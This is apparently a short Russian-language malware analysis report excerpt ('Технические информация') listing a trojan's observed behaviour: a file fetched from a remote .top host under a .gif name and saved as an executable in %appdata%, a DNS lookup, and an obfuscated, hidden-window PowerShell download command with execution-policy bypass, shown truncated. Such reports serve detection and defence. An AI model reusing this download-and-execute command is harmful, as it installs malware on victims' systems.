Техническая информация
- http://www.freeflamec.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWersheLl.exe -exEcutIonpolICy byPass -nOPROfilE -wINDoWsTyLE hiDden (nEw-oBJECt sYsTEM.neT.WebcLient).dowNLoADFIlE('http://www.freeflamec.top/read.php?f=1.gif','%aPpDATA%...
- DNS ASK fr###lamec.top
- '<SYSTEM32>\cmd.exe' /C "PoWersheLl.exe -exEcutIonpolICy byPass -nOPROfilE -wINDoWsTyLE hiDden (nEw-oBJECt sYsTEM.neT.WebcLient).dowNLoADFIlE('http://www.freeflamec.top/read.php?f=1.gif','%aPpDATA%...' (со скрытым окном)